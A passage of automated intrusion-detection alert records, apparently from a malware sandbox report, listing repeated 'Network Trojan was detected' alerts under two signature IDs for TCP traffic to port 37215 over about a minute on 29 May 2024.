                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091341
                SID:2835222
                Source Port:43008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237105
                SID:2829579
                Source Port:46712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525344
                SID:2835222
                Source Port:56114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154190
                SID:2829579
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618156
                SID:2835222
                Source Port:35908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021583
                SID:2835222
                Source Port:35646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823990
                SID:2835222
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870415
                SID:2829579
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898188
                SID:2835222
                Source Port:55790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876271
                SID:2835222
                Source Port:47134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766795
                SID:2835222
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026470
                SID:2835222
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325630
                SID:2829579
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321170
                SID:2835222
                Source Port:43066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504597
                SID:2835222
                Source Port:54628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812169
                SID:2835222
                Source Port:36142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466017
                SID:2829579
                Source Port:51216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898428
                SID:2835222
                Source Port:51426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872844
                SID:2835222
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384468
                SID:2829579
                Source Port:59408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653481
                SID:2829579
                Source Port:33474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027385
                SID:2829579
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536750
                SID:2829579
                Source Port:52892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079043
                SID:2835222
                Source Port:56720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508968
                SID:2829579
                Source Port:36648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902056
                SID:2829579
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269121
                SID:2835222
                Source Port:40970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816509
                SID:2829579
                Source Port:45842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563605
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837428
                SID:2835222
                Source Port:49348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281681
                SID:2835222
                Source Port:48402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416624
                SID:2829579
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465443
                SID:2835222
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.616661
                SID:2829579
                Source Port:58140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993106
                SID:2835222
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223122
                SID:2829579
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941717
                SID:2829579
                Source Port:38998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2829579
                Source Port:34580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385996
                SID:2835222
                Source Port:34804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764181
                SID:2829579
                Source Port:44668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501172
                SID:2835222
                Source Port:51798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793670
                SID:2829579
                Source Port:33950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974227
                SID:2829579
                Source Port:43712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929851
                SID:2829579
                Source Port:41872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073901
                SID:2835222
                Source Port:53012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562205
                SID:2835222
                Source Port:57274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773478
                SID:2835222
                Source Port:43776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397311
                SID:2835222
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558175
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958762
                SID:2835222
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134066
                SID:2835222
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436032
                SID:2835222
                Source Port:47654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556899
                SID:2829579
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896867
                SID:2829579
                Source Port:49244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325408
                SID:2835222
                Source Port:39358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558243
                SID:2829579
                Source Port:51938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872794
                SID:2829579
                Source Port:54812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654254
                SID:2835222
                Source Port:44892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266598
                SID:2835222
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272426
                SID:2835222
                Source Port:39960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716305
                SID:2835222
                Source Port:44218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985995
                SID:2829579
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618822
                SID:2835222
                Source Port:40576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.654826
                SID:2835222
                Source Port:36174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857177
                SID:2835222
                Source Port:40036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032599
                SID:2835222
                Source Port:60070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893711
                SID:2835222
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286314
                SID:2829579
                Source Port:45542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225564
                SID:2829579
                Source Port:36706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543568
                SID:2829579
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209883
                SID:2835222
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873351
                SID:2835222
                Source Port:41014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672642
                SID:2835222
                Source Port:58112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281446
                SID:2835222
                Source Port:40070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878749
                SID:2835222
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931419
                SID:2829579
                Source Port:36608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109103
                SID:2835222
                Source Port:33670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660395
                SID:2835222
                Source Port:48064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819020
                SID:2829579
                Source Port:53846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582915
                SID:2835222
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465400
                SID:2829579
                Source Port:40678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021654
                SID:2835222
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896949
                SID:2829579
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224621
                SID:2835222
                Source Port:42512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980093
                SID:2835222
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971445
                SID:2829579
                Source Port:55896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783995
                SID:2829579
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893663
                SID:2835222
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790662
                SID:2829579
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521068
                SID:2829579
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801391
                SID:2829579
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155165
                SID:2829579
                Source Port:44442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945781
                SID:2835222
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971900
                SID:2829579
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872773
                SID:2829579
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899129
                SID:2835222
                Source Port:37016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475057
                SID:2829579
                Source Port:41270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225474
                SID:2829579
                Source Port:37184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975130
                SID:2829579
                Source Port:38452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318094
                SID:2835222
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324998
                SID:2835222
                Source Port:36646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209331
                SID:2829579
                Source Port:50192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813246
                SID:2829579
                Source Port:48080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688935
                SID:2835222
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763160
                SID:2829579
                Source Port:34434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789501
                SID:2835222
                Source Port:38816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762878
                SID:2835222
                Source Port:38344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618540
                SID:2829579
                Source Port:57302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.516929
                SID:2835222
                Source Port:48210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331592
                SID:2835222
                Source Port:41594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824220
                SID:2829579
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717974
                SID:2829579
                Source Port:42130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901374
                SID:2829579
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586414
                SID:2835222
                Source Port:37508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421086
                SID:2829579
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232118
                SID:2829579
                Source Port:57156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277453
                SID:2835222
                Source Port:37768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853850
                SID:2829579
                Source Port:59924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184640
                SID:2835222
                Source Port:51846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666365
                SID:2829579
                Source Port:39106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901153
                SID:2829579
                Source Port:40450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100578
                SID:2829579
                Source Port:42900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721709
                SID:2835222
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166767
                SID:2835222
                Source Port:39134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776610
                SID:2829579
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850407
                SID:2829579
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796056
                SID:2835222
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094802
                SID:2835222
                Source Port:51358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515561
                SID:2829579
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510940
                SID:2835222
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669751
                SID:2829579
                Source Port:37816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320091
                SID:2835222
                Source Port:39986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795375
                SID:2829579
                Source Port:40376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135613
                SID:2835222
                Source Port:54180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669351
                SID:2829579
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738529
                SID:2835222
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165189
                SID:2835222
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462563
                SID:2835222
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562876
                SID:2829579
                Source Port:54236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796787
                SID:2829579
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726117
                SID:2829579
                Source Port:43508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501773
                SID:2835222
                Source Port:45294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548505
                SID:2829579
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888975
                SID:2835222
                Source Port:39580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584069
                SID:2829579
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773163
                SID:2835222
                Source Port:42114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967286
                SID:2835222
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669598
                SID:2829579
                Source Port:48048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531274
                SID:2835222
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.024823
                SID:2835222
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519044
                SID:2829579
                Source Port:56332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653753
                SID:2835222
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415213
                SID:2835222
                Source Port:33846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511161
                SID:2835222
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316587
                SID:2835222
                Source Port:54422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175611
                SID:2829579
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785592
                SID:2829579
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571015
                SID:2829579
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798139
                SID:2829579
                Source Port:37524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715345
                SID:2835222
                Source Port:60136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899087
                SID:2835222
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919471
                SID:2835222
                Source Port:56128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166511
                SID:2835222
                Source Port:41338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811474
                SID:2829579
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969769
                SID:2835222
                Source Port:44960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072687
                SID:2835222
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664219
                SID:2835222
                Source Port:55638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816071
                SID:2829579
                Source Port:39550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385339
                SID:2835222
                Source Port:49308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959030
                SID:2829579
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660832
                SID:2829579
                Source Port:50768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675052
                SID:2835222
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979568
                SID:2835222
                Source Port:52860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719971
                SID:2835222
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965369
                SID:2835222
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575432
                SID:2835222
                Source Port:55882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385816
                SID:2835222
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722468
                SID:2829579
                Source Port:35438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840838
                SID:2829579
                Source Port:38946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854479
                SID:2829579
                Source Port:49366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.291993
                SID:2835222
                Source Port:58080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228869
                SID:2835222
                Source Port:54268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328339
                SID:2829579
                Source Port:56298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887654
                SID:2829579
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212012
                SID:2829579
                Source Port:57478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684738
                SID:2835222
                Source Port:40268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181750
                SID:2829579
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840418
                SID:2835222
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520665
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584024
                SID:2829579
                Source Port:41636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683640
                SID:2835222
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583703
                SID:2835222
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177051
                SID:2835222
                Source Port:57776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782470
                SID:2829579
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847301
                SID:2829579
                Source Port:49436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275346
                SID:2829579
                Source Port:46386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512134
                SID:2835222
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
